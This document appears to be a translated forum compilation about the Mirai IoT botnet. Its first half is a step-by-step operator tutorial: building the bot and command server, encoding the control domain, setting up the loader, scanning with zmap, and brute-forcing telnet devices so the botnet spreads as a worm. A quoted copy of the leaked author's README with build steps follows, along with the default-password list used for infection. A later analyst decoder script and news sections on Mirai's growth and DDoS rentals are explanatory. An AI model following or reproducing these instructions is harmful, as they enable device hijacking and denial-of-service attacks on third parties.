Mirai source code. Installation and configuration of the Mirai botnet. Operating principle of Mirai

At its core, Mirai works simply: it scans the Internet looking for IoT devices accessible via telnet that are vulnerable to brute force and hacking. The malware primarily attacks surveillance cameras, DVRs, and routers, and then continues to multiply like a worm.

The DDoS attacks recently carried out by this botnet include the largest ever seen in Europe. Peak attack power reached 620 Gbit/s and more than 1 Tb/s. To achieve such results, the attackers used UDP, DNS and HTTP flooding, as well as GRE (Generic Routing Encapsulation) packets, which experts recognized as very unusual.

The conclusions of MalwareTech specialists generally coincide with these observations. Over a twelve-hour period, researchers recorded about 72,000 unique IP addresses, with 4,000 new IPs appearing every hour. From this, analysts concluded that the size of the botnet is quite modest: only about 120,000 devices per day. And although some claim the botnet is much larger, citing figures of 1-1.5 million bots, neither MalwareTech researchers nor Akamai specialists agree with this.

“Mirai, which was previously largely ignored due to the simplicity of telnet attacks, became a major topic of discussion in the media around the world last week, with law enforcement agencies launching investigations, with the support of many international companies,” the researchers write. “It is highly likely that powerful DDoS attacks will now become more common practice as hackers find more and more vulnerable IoT devices or begin to infect NAT-protected devices. It's definitely time for manufacturers to stop releasing devices with global passwords by default and switch to releasing devices with randomly generated passwords on the bottom of the case.”

In addition to the report, MalwareTech researchers have included a video showing a map of Mirai infections (see below). Also on the researchers’ website you can find an interactive map of the botnet, which is updated in real time.

We will need two VPS KVM servers and a domain. Virtualization is KVM, OpenVZ is missing this time.

I take the servers here -

We will install the botnet itself on one server, and scan bots on the second. (brutal)

IMPORTANT. Servers must be based on Debian 8 and have at least 1GB of RAM.

Any domain, it doesn't matter.

Sorry, of course, but I won’t tell you how to attach a domain to a VPS. It's not difficult, you'll figure it out yourself.

PuTTY and let's begin.

# apt-get update -y

# apt-get upgrade -y

# apt-get install unzip gcc golang electric-fence screen sudo git -y

# apt-get install mysql-server -y

# apt-get install mysql-client -y

# apt-get install apache2 -y

When installing MySQL, you will need to create a password to access MySQL for the root user. You will come up with a normal password, without any “qwerty”

Write it down somewhere, we will need it again.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y

#bash< <(curl -s -S -L

You must be registered to see links.

)

# gvm install go1.4

# gvm use go1.4 [--default]

# gvm install go1.4 -B

# gvm use go1.4

# export GOROOT_BOOTSTRAP=$GOROOT

# gvm install go1.5

# gvm use go1.5

# gvm install go1.8

# gvm use go1.8

After installing all the utilities, download the bot sources -

You must be registered to see links.

And upload it to the server. Team wget, or simply through the program WinSCP.

# unzip Mirai-Source-Code-master.zip

# cd Mirai-Source-Code-Master/mirai/tools

# gcc enc.c -o enc

# ./enc string *******(we write our domain, which is attached to the server) and press Enter.

Here you will see the following text -

XOR"ing 14 bytes of data...

\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22

14 - here you will have a different number, so don’t worry, everything is correct.

We copy all this text.

Open via nano editor, or via WinSCP file table.c which is in the folder mirai/bot

Must see this -

You must be registered to see links.

Line add_entry(TABLE_CNC_DOMAIN- change everything in quotes to your text that you just copied. Instead of " 30 " We write our number, which we also just copied. We do the same with the line add_entry(TABLE_SCAN_CB_DOMAIN

Save and close the editor.

Open the file with an editor mirai/cnc/main.go

We see this -

You must be registered to see links.

"127.0.0.1" change to "127.0.0.1:3306"

"password" We change the password that we entered earlier to our MySQL. "

Save the file and close the editor.

Just copy all this crap, I won’t tell you why it’s needed -

# mkdir /etc/xcompile

# cd /etc/xcompile

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

#wget

You must be registered to see links.

# tar -jxf cross-compiler-armv4l.tar.bz2

# tar -jxf cross-compiler-i586.tar.bz2

# tar -jxf cross-compiler-m68k.tar.bz2

# tar -jxf cross-compiler-mips.tar.bz2

# tar -jxf cross-compiler-mipsel.tar.bz2

# tar -jxf cross-compiler-powerpc.tar.bz2

# tar -jxf cross-compiler-sh4.tar.bz2

# tar -jxf cross-compiler-sparc.tar.bz2

# tar -jxf cross-compiler-armv6l.tar.bz2

# rm *.tar.bz2

# mv cross-compiler-armv4l armv4l

# mv cross-compiler-i586 i586

#mv cross-compiler-m68k m68k

# mv cross-compiler-mips mips

# mv cross-compiler-mipsel mipsel

# mv cross-compiler-powerpc powerpc

# mv cross-compiler-sh4 sh4

# mv cross-compiler-sparc sparc

# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin

# export PATH=$PATH:/etc/xcompile/m68k/bin

# export PATH=$PATH:/etc/xcompile/mips/bin

# export PATH=$PATH:/etc/xcompile/mipsel/bin

# export PATH=$PATH:/etc/xcompile/powerpc/bin

# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin

# export PATH=$PATH:/etc/xcompile/sh4/bin

# export PATH=$PATH:/etc/xcompile/sparc/bin

# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin

# export GOPATH=$HOME/Documents/go

# go get github.com/go-sql-driver/mysql

# go get github.com/mattn/go-shellwords

# cd Mirai-Source-Code-master/mirai

# ./build.sh debug telnet

# ./build.sh release telnet

# mv mirai* /var/www/html

# cd /var/www/html

#mkdirbins

#mv*bins/

Now MySQL.

# mysql -u root -p

Here you will be asked for a password. Enter the password you previously set.

# create database mirai;

# use mirai

Now copy all the text from here -

You must be registered to see links.

Paste it in and press Enter.

Copy the text from here -

You must be registered to see links.

Instead of anna-senpai write your login. Any. Same with myawesomepassword. We will need this data to access the bot control panel.

It should be like this - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");

Copy, paste, press Enter.

Now you can go out.

It's almost done.

# cd Mirai-Source-Code-master/mirai/release

# touch prompt.txt

# screen ./cnc

Must see the inscription MySQL DB opened

We don’t close this session, we open a new one.

You must be registered to see links.

Instead of *******, write your domain and click Open.

Enter your username and password, in my case it is -

zaebalsjapisatj

That's it, we are in the bot control panel.

Now we need bots. Everything is simple here, no installations are needed.

Let's configure loader.

Loader is needed so that bots can be added from text files. Let's say we've created a bunch of devices (routers, cameras, phones) and to add them to the bot, we need a loader.

Also loader is a "worm"

Connect to our server via PuTTY and WinSCP.

Using WinSCP we find the file main.c in folder Mirai-Source-Code-master/dlr

We write the IP of our server as in the screenshot -

You must be registered to see links.

We leave the commas, that’s how it should be. Save and close.

Now with PyTTY go to our server and write -

# cd Mirai-Source-Code-master/dlr

# chmod 777 *

# ./build.sh

# cd release

# mv dlr* ~/Mirai-Source-Code-master/loader/bins

Now let's open WinSCP and find the file main.c in folder Mirai-Source-Code-master/loader/src

We change it to our IP as in the screenshot -

You must be registered to see links.

Save and close.

Through PuTTY -

# ./build.sh

By using WinSCP open the file scanListen.go which can be found in the folder Mirai-Source-Code-master/mirai/tools

Change to your server IP -

You must be registered to see links.

Then with PyTTY -

# cd Mirai-Source-Code-master/mirai/tools

# go build scanListen.go

Now we have a new file - scanListen(without .go, Just scanListen)

scanListen need to be moved to a folder Mirai-Source-Code-master/loader

Just with help WinSCP put it in a folder loader

Now let's check if everything works

# ./loader

If you see what is on the screen, then everything is correct -

You must be registered to see links.

If errors occur, write to the topic, I will help.

To download bots from the list, drop the text file into the folder loader and type the command -

# cat list.txt | ./loader

That's it, all the bots you recruited will be with you, they will crash sites at your command.

I personally haven’t used this method, I found an easier way.

Here we need a second server. Also on Debian 8.

# apt-get update -y

# apt-get upgrade -y

# apt-get install python-paramiko -y

# apt-get install zmap -y

zmap we need it for port scanning. The principle of operation is the same as KPortScan, only 50 times faster.

Copy all the code from here -

You must be registered to see links.

And save as scan.py

Here you can add your passwords and logins -

You must be registered to see links.

String combo don't touch!

Here you need to register the IP of the server on which the bot is located -

You must be registered to see links.

We change everything and save it.

We drop the scan.py file anywhere on our server. On the second server, which is purely for scanning, the one on which we do not touch the bot.

We need IPs that we will scan.

#zmap -p22 -o list.txt -B 100M(you can scan other ports, I always scanned 22 or 23)

All results will be in the file list.txt

After collecting the IP (the more the better) file list.txt throw it next to the file scan.py and write -

# python scan.py list.txt 500

That's it, we sit and watch how our botnet grows.

When there are at least 200 bots, you can launch loader.

To do this, go to the server where the botnet is installed and -

# cd Mirai-Source-Code-master/loader

# ulimit -n 9999999

# ./scanListen | ./loader

Now the bot will work like a “worm” and finish off more bots.

Last week, the source code for the components of the Mirai botnet, used in record-breaking DDoS attacks with a capacity of up to 1 Tb/s, leaked online.

Art. 273 of the Criminal Code of the Russian Federation. Creation, use and distribution of malicious computer programs

1. Creation, distribution or use of computer programs or other computer information, knowingly intended for unauthorized destruction, blocking, modification, copying of computer information or neutralization of computer information protection means, -

shall be punishable by restriction of liberty for a term of up to four years, or forced labor for a term of up to four years, or imprisonment for the same term with a fine in the amount of up to two hundred thousand rubles or in the amount of the wages or other income of the convicted person for a period of up to eighteen months.

2. Acts provided for in part one of this article, committed by a group of persons by prior conspiracy or by an organized group or by a person using their official position, as well as those that caused major damage or were committed out of selfish interest, -

shall be punishable by restriction of liberty for a term of up to four years, or forced labor for a term of up to five years with deprivation of the right to hold certain positions or engage in certain activities for a term of up to three years or without it, or imprisonment for a term of up to five years with a fine of one hundred thousand to two hundred thousand rubles or in the amount of wages or other income of the convicted person for a period of two to three years or without it and with or without deprivation of the right to hold certain positions or engage in certain activities for a period of up to three years.

3. Acts provided for in parts one or two of this article, if they entailed grave consequences or created a threat of their occurrence, -

shall be punishable by imprisonment for a term of up to seven years.

This botnet consists mainly of cameras, DVR devices, etc.

Infection is quite simple: the Internet is scanned for open 80/23 (web/telnet) ports and hard-coded default accounts are tried.

Few users change the passwords of built-in accounts (where that is even possible), so the botnet is constantly replenished with new devices. Even where the web interface lets you change its password, the telnet password, and the very existence of telnet access, simply escape many users' notice.

The most commonly used accounts are:

enable:system
shell:sh
admin:admin
root:xc3511
root:vizxv
root:admin
root:xmhdipc
root:123456
root:888888
support:support
root:54321
root:juantech
root:anko
root:12345
admin:
root:default
admin:password
root:root
root:
user:user
admin:smcadmin
root:pass
admin:admin1234
root:1111
guest:12345
root:1234
root:password
root:666666
admin:1111
service:service
root:system
supervisor:supervisor
root:klv1234
administrator:1234
root:ikwb
root:Zte521

After gaining access, the command center receives a binary notification about the presence of a new bot:

4a 9a d1 d1 = XXX.XXX.XXX.XXX (the host address was here)
05 = Tab
17 = 23 (Port 23 Telnet)
05 = Tab
61 64 6d 69 6e = username: admin
05 = Tab
61 64 6d 69 6e = password: admin

The botnet components are designed to work in different environments, as evidenced by the identified samples:

mirai.arm
mirai.arm7
mirai.mips
mirai.ppc
mirai.sh4

Command servers are currently located at the following addresses:


The instructions for creating a botnet are quite simple, here is as is (source http://pastebin.com/E90i6yBB):

Hello everyone,

When I first got into the DDoS industry, I wasn’t planning on staying in it long. I made my money, there’s lots of eyes looking at IOT now, so it’s time to GTFO. However, I know every skid and their mama, it’s their wet dream to have something besides qbot.

So today, I have an amazing release for you. With Mirai, I usually pull max 380k bots from telnet alone. However, after the Kreb DDoS, ISPs were slowly shutting down and cleaning up their act. Today, max pull is about 300k bots, and dropping.

So, I am your senpai, and I will treat you real nice, my hf-chan.

And to everyone that thought they were doing anything by hitting my CNC, I had good laughs, this bot uses domain for CNC. It takes 60 seconds for all bots to reconnect, lol

Also, shoutout to this blog post by malwaremustdie
http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html
https://web.archive.org/web/20160930230210/http://blog.malwaremustdie.org/2016/08/mmd-0056-2016-linuxmirai-just.html<- backup in case low quality reverse engineer unixfreaxjp decides to edit his posts lol
Had a lot of respect for you, thought you were good reverser, but you really just completely and totally failed in reversing this binary. “We still have better kung fu than you kiddos” don’t make me laugh please, you made so many mistakes and even confused some different binaries with mine. LOL

Let me give you some slaps back—
1) port 48101 is not for back connect, it is for control to prevent multiple instances of bot running together
2) /dev/watchdog and /dev/misc are not for “making the delay”, it for preventing system from hanging. This one is low-hanging fruit, so sad that you are extremely dumb
3) You failed and thought FAKE_CNC_ADDR and FAKE_CNC_PORT was real CNC, lol “And doing the backdoor to connect via HTTP on 65.222.202.53.” you got tripped up by signal flow ;) try harder skiddo
4) Your skeleton tool sucks ass, it thought the attack decoder was “sinden style”, but it does not even use a text-based protocol? CNC and bot communicate over binary protocol
5) you say ‘chroot(“/”) so predictable like torlus’ but you don’t understand, some others kill based on cwd. It shows how out-of-the-loop you are with real malware. Go back to skidland

Why are you writing reverse engineer tools? You cannot even correctly reverse in the first place. Please learn some skills first before trying to impress others. Your arrogance in declaring how you “beat me” with your dumb kung-fu statement made me laugh so hard while eating my SO had to pat me on the back.

Just as I will forever be free, you will be doomed to mediocracy forever.

Requirements
2 servers: 1 for CNC + mysql, 1 for scan receiver, and 1+ for loading

OP Requirements
2 VPS and 4 servers
— 1 VPS with extremely bulletproof host for database server
— 1 VPS, rootkitted, for scanReceiver and distributor
— 1 server for CNC (used like 2% CPU with 400k bots)
— 3x 10gbps NForce servers for loading (distributor distributes to 3 servers equally)

— To establish connection to CNC, bots resolve a domain (resolv.c/resolv.h) and connect to that IP address
— Bots brute telnet using an advanced SYN scanner that is around 80x faster than the one in qbot, and uses almost 20x less resources. When finding a brute result, the bot resolves another domain and reports it. This is chained to a separate server to automatically load onto devices as results come in.
— Bruted results are sent by default on port 48101. The utility called scanListen.go in tools is used to receive bruted results (I was getting around 500 bruted results per second at peak). If you build in debug mode, you should see the utility scanListen binary appear in debug folder.

Mirai uses a spreading mechanism similar to self-rep, but what I call “real-time-load”. Basically, bots brute results, send it to a server listening with scanListen utility, which sends the results to the loader. This loop (brute -> scanListen -> load -> brute) is known as real time loading.

The loader can be configured to use multiple IP address to bypass port exhaustion in linux (there are limited number of ports available, which means that there is not enough variation in tuple to get more than 65k simultaneous outbound connections — in theory, this value lot less). I would have maybe 60k — 70k simultaneous outbound connections (simultaneous loading) spread out across 5 IPs.
Bot has several configuration options that are obfuscated in (table.c/table.h). In ./mirai/bot/table.h you can find most descriptions for configuration options. However, in ./mirai/bot/table.c there are a few options you *need* to change to get working.

— TABLE_CNC_DOMAIN — Domain name of CNC to connect to — DDoS avoidance very fun with mirai, people try to hit my CNC but I update it faster than they can find new IPs, lol. Retards:)
— TABLE_CNC_PORT — Port to connect to, its set to 23 already
— TABLE_SCAN_CB_DOMAIN — When finding brute results, this domain it is reported to
— TABLE_SCAN_CB_PORT — Port to connect to for brute results, it is set to 48101 already.

In ./mirai/tools you will find something called enc.c — You must compile this to output things to put in the table.c file

Run inside this mirai directory

./build.sh debug telnet

You will get some errors related to cross-compilers not being there if you have not configured them. This is ok, won’t affect compiling the enc tool

Now, in the ./mirai/debug folder you should see a compiled binary called enc. For example, to get obfuscated string for domain name for bots to connect to, use this:

./debug/enc string fuck.the.police.com
The output should look like this

XOR’ing 20 bytes of data…
\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22
To update the TABLE_CNC_DOMAIN value for example, replace that long hex string with the one provided by enc tool. Also, you see “XOR’ing 20 bytes of data”. This value must replace the last argument as well. So for example, the table.c line originally looks like this
add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com
Now that we know value from enc tool, we update it like this

add_entry(TABLE_CNC_DOMAIN, "\x44\x57\x41\x49\x0C\x56\x4A\x47\x0C\x52\x4D\x4E\x4B\x41\x47\x0C\x41\x4D\x4F\x22″, 20); //fuck.the.police.com
Some values are strings, some are port (uint16 in network order / big endian).
CONFIGURE THE CNC:
apt-get install mysql-server mysql-client

CNC requires database to work. When you install database, go into it and run following commands:
http://pastebin.com/86d0iL9g

This will create a database for you. To add your user,

INSERT INTO users VALUES (NULL, 'anna-senpai', 'myawesomepassword', 0, 0, 0, 0, -1, 1, 30, ");
Now, go into file ./mirai/cnc/main.go

Edit these values
const DatabaseAddr string = "127.0.0.1"
const DatabaseUser string = "root"
const DatabasePass string = "password"
const DatabaseTable string = "mirai"
To the information for the mysql server you just installed

Cross compilers are easy, follow the instructions at this link to set up. You must restart your system or reload .bashrc file for these changes to take effect.

http://pastebin.com/1rRCc3aD
The CNC, bot, and related tools:
http://dopefile.pk/a9f2n9ewk8om
How to build bot + CNC
In mirai folder, there is build.sh script.
./build.sh debug telnet

Will output debug binaries of bot that will not daemonize and print out info about if it can connect to CNC, etc, status of floods, etc. Compiles to ./mirai/debug folder
./build.sh release telnet

Will output production-ready binaries of bot that are extremely stripped, small (about 60K) that should be loaded onto devices. Compiles all binaries in format: “mirai.$ARCH” to ./mirai/release folder

Loader reads telnet entries from STDIN in following format:
ip:port user:pass
It detects if there is wget or tftp, and tries to download the binary using that. If not, it will echoload a tiny binary (about 1kb) that will suffice as wget.
./build.sh

Will build the loader, optimized, production use, no fuss. If you have a file in formats used for loading, you can do this
cat file.txt | ./loader
Remember to limit!

Just so it’s clear, I’m not providing any kind of 1 on 1 help tutorials or shit, too much time. All scripts and everything are included to set up working botnet in under 1 hours. I am willing to help if you have individual questions (how come CNC not connecting to database, I did this this this blah blah), but not questions like “My bot not connect, fix it”
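As an added example for analysts recovering a sample's configuration (not code from the leaked archive or from the tutorial above), here is a decoder for the table.c obfuscation that the enc tool in the quoted README produces. It assumes, as in the leaked table.c, that the key is the constant 0xdeadbeef whose four bytes are XOR-folded into one byte (0x22), and that each stored string carries its nul terminator, which is why enc reports one byte more than the string length; the parser also flags an add_entry line whose declared length does not match its literal, as in the cnc.changeme.com line quoted above (30 declared, 17 actual).

```python
"""Decode/encode the obfuscated strings Mirai keeps in bot/table.c.

Added analyst example, not code from the leaked source. The key material is
the 32-bit constant 0xdeadbeef from the leaked table.c; the bot XORs the four
key bytes into each value byte, which collapses to a single-byte XOR (0x22).
Strings are stored with their nul terminator, so enc reports "20 bytes" for
a 19-character domain.
"""
import re

TABLE_KEY = 0xDEADBEEF  # key constant used by the leaked table.c / enc.c


def fold_key(key: int = TABLE_KEY) -> int:
    """XOR the four key bytes together into the single byte actually applied."""
    k = 0
    for shift in (24, 16, 8, 0):
        k ^= (key >> shift) & 0xFF
    return k  # 0x22 for 0xdeadbeef


def decode_entry(blob: bytes, key: int = TABLE_KEY) -> str:
    """Recover the plaintext of one string entry (drops the trailing nul)."""
    k = fold_key(key)
    plain = bytes(b ^ k for b in blob)
    return plain.split(b"\x00", 1)[0].decode("ascii", errors="replace")


def encode_entry(text: str, key: int = TABLE_KEY) -> bytes:
    """Same transform as the enc tool's 'string' mode: nul-terminated, XORed."""
    k = fold_key(key)
    return bytes(b ^ k for b in text.encode("ascii") + b"\x00")


def decode_port(blob: bytes, key: int = TABLE_KEY) -> int:
    """Port entries are 2 bytes, big endian, XORed the same way."""
    if len(blob) != 2:
        raise ValueError("port entries are exactly 2 bytes")
    k = fold_key(key)
    return ((blob[0] ^ k) << 8) | (blob[1] ^ k)


def encode_port(port: int, key: int = TABLE_KEY) -> bytes:
    k = fold_key(key)
    return bytes([((port >> 8) & 0xFF) ^ k, (port & 0xFF) ^ k])


def c_escape(blob: bytes) -> str:
    """Render bytes in the \\xNN form used inside table.c literals."""
    return "".join(f"\\x{b:02X}" for b in blob)


_ENTRY_RE = re.compile(
    r'add_entry\(\s*(TABLE_[A-Z0-9_]+)\s*,\s*"((?:\\x[0-9A-Fa-f]{2})+)"\s*,\s*(\d+)\s*\)'
)


def parse_table_line(line: str, key: int = TABLE_KEY) -> dict:
    """Parse one add_entry(...) line from table.c into a decoded record.

    'length_ok' is False when the declared length differs from the number of
    bytes in the literal, the quirk seen in the leaked cnc.changeme.com line.
    """
    m = _ENTRY_RE.search(line)
    if not m:
        raise ValueError(f"not an add_entry line: {line!r}")
    name, esc, declared = m.group(1), m.group(2), int(m.group(3))
    blob = bytes(int(h, 16) for h in re.findall(r"\\x([0-9A-Fa-f]{2})", esc))
    return {
        "name": name,
        "value": decode_entry(blob, key),
        "declared_len": declared,
        "actual_len": len(blob),
        "length_ok": declared == len(blob),
    }


if __name__ == "__main__":
    # Line quoted in the leaked README (table.c before any modification).
    sample = r'add_entry(TABLE_CNC_DOMAIN, "\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22", 30); //cnc.changeme.com'
    print(parse_table_line(sample))
    # Constructed placeholder domain, round-tripped through the same transform.
    print(c_escape(encode_entry("example.invalid")))
```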

This is the Trojan that everyone has been writing about for the last few weeks. Among the most impressive achievements of botnets built with it are an attack with a capacity of more than a terabit and an attack in a small African country.

How many computers did it enslave for this?

None at all. Or at least very few. Mirai's targets are not computers at all, but IoT devices: video recorders, cameras, toasters... According to statistics from Level 3 Communications, by the end of October about half a million devices were already under the Trojan's control.

So it can grab any camera or refrigerator?

Not really. Mirai is designed for devices running BusyBox, a simplified set of UNIX command-line utilities that serves as the main interface in embedded operating systems. The Trojan only attacks certain platforms, such as ARM, ARM7, MIPS, PPC, SH4, SPARC and x86. Only devices with factory settings or very weak protection are at risk: infection occurs through a brute-force attack on the Telnet port using a built-in list of default administrator credentials.

It’s somehow ineffective to search the entire Internet for cameras without passwords - isn’t it?

Wrong guess. A journalist from The Atlantic rented a server and wrote a program that pretends to be a toaster. The first attack on the “household appliance” came after 40 minutes! Over the next 11 hours, the toaster was hacked more than 300 times. The reason is that botnets have reached unprecedented sizes, and the IPv4 address space is very small for them. Moreover, remember that hackers do not search for vulnerable devices manually; the members of the botnet do it. And since each newly recruited “employee” also begins to look for victims, the botnet grows exponentially.

Exponentially? So in a year, botnets will contain trillions of devices?!

Of course not 😀 The fact is that the number of IoT devices is finite. And this is already quite a pressing problem. The author of Mirai admits that the maximum number of devices on his network was 380 thousand, and after several attacks, when users and providers began to take protective measures, the number of devices dropped to 300 thousand and continues to decline.

After the Mirai source code was made public, many, many hackers began to use it. Currently there are about 52 large botnets based on this Trojan. It is worth clarifying that each device can belong to only one network: immediately after capturing a device, the malware protects it from re-infection. The only case in which a device can pass to another “owner” is when it is restarted. According to experts, after a restart the device will be infected again within 30 seconds.

So the effectiveness of Mirai is decreasing?

Yes. Hackers are forced to fight over a limited pool of resources, which is shrinking (due to precautions) rather than growing. The situation is further complicated by the fact that hackers are extremely selfish: for example, after one of the botnet's major command and control (C&C) servers was simply switched off, the botnet turned out to be useless and yet invulnerable to new infection. Each new Mirai-based network will be smaller than the previous ones and will only be able to carry out low-power attacks. For example, during the US elections, weak attacks were carried out on the websites of Clinton and Trump. They caused no damage, and nobody noticed them at all (except the company that specifically monitors this Trojan's activity).

Understood. What other interesting information is known about this Trojan?

It is the successor of another Trojan, which is known by the names Gafgyt, Lizkebab, BASHLITE, Bash0day, Bashdoor and Torlus. The latter is known for being able to subjugate about a million webcams, according to the same Level 3 Communications. It is also known that most botnets do not use a pure copy of Mirai, but their own, modified versions (which is quite expected).

Another interesting fact is that RuNet users found a Russian trace in the Mirai source code: the file cnc/admin.go outputs comments in Russian:

cnc/admin.go: this.conn.Write(byte(“\033))

On the other hand, it looks more like a joke - “checking the accounts...” is an obvious copy (machine translation?) of “checking accounts”.

Last month there were attacks on large sites such as Twitter and Spotify that temporarily took them down. The Mirai botnet, uniting 400-500 thousand Internet of Things devices, was used for this. Now Motherboard journalists have learned that two hackers managed to seize control of the botnet and create a new version of it that already unites a million devices. Subscribers of the German provider Deutsche Telekom, whose network was down last weekend, have experienced its power.

Hunting for Mirai

Journalists managed to talk to one of these two mysterious hackers - he uses the nickname BestBuy. In an encrypted online chat, he told them that there was a real struggle among hackers for control of Mirai. A vulnerability was recently discovered in its software. Its use, coupled with its speed, could allow BestBuy and its partner Popopret to seize control of most of the botnet and add new devices to it.

Previously, our experts studied the code of the Mirai botnet - it turned out that it was not created specifically for Internet of Things devices. Malicious software searches for devices connected to the network with default logins and passwords (admin:admin, root:password, etc.). This means that, theoretically, it can include any devices, including home computers and servers or routers.

IoT devices, usually routers, stay in the Mirai botnet only until they reboot; then the worm is erased from their memory. However, the botnet constantly scans the Internet for vulnerable devices, so a “cured” device can quickly become part of it again. There is a real race among hackers to be the first to infect as many devices as possible.

There is no information about how the creators of the new Mirai manage to overtake their competitors. However, they told reporters that they use their own botnet to scan potentially vulnerable devices, including those that were previously part of the botnet.

"Why not have the Mirai hunt the Mirai and devour the original," says BestBuy.

Not only Mirai

However, the new botnet not only absorbed old Mirai devices and new ones with default passwords. Its creators also use 0-day vulnerabilities in the firmware of IoT devices. Experts previously predicted the imminent emergence of such “combined” botnets.

The fight against them becomes noticeably more complicated - if in order to counter Mirai the user of the end device only needs to change the login and password to access it, then he will not be able to cope with the vulnerabilities of the gadget on his own.

DDoS at 700 Gbps

The hackers BestBuy and Popopret have started advertising their services, offering access to their new version of Mirai by sending spam messages via XMPP/Jabber.

According to the hacker, they offer customers several service packages. The cheaper one costs $2,000: for this money clients can rent 20,000 to 25,000 botnet nodes to launch one-hour attacks for up to two weeks, with a fifteen-minute break between attacks. For $15,000 or $20,000 customers get 600,000 bots launching two-hour attacks with 30- or 15-minute breaks. In the second case, the attack power will be 700 Gbit/s or more.

Prospects

The security of IoT devices is often fairly low. This is because vendors are often not interested in implementing additional information security measures: they advertise the ease of use of their products, while any additional security measures impose restrictions and consume resources.

As stated above, only the developers of end devices, or the providers supplying them (in the case of routers), can protect users from more advanced botnets. The German provider Deutsche Telekom, hit by the attack of the new Mirai version, has already announced that it will “reconsider business relations” with the supplier of the vulnerable Speedport routers, the company Arcadyan.

Ultimately, it will be possible to increase the level of security of the Internet of Things through the introduction of stricter control of devices on the part of providers, on the one hand, and the development of standards and regulatory documentation for IoT, on the other. Similar measures have already been taken in many countries to ensure the safety of automated process control systems. The first steps in this direction have already been taken - for example, several IT vendors published a document in September called The Industrial Internet Security Framework (IISF)- it proposes to consider the Internet of things as part of the “industrial Internet”.

However, the issue is still far from being finally resolved, and hackers BestBuy and Popopret may obtain a monopoly on large-scale DDoS attacks online. This is a rather sad fact, but the hackers themselves, during a conversation with Motherboard declared that their activities would be guided not only by profit, but also by moral principles. So BestBuy said that they will not allow customers to attack the IP addresses of companies working with critical infrastructure.
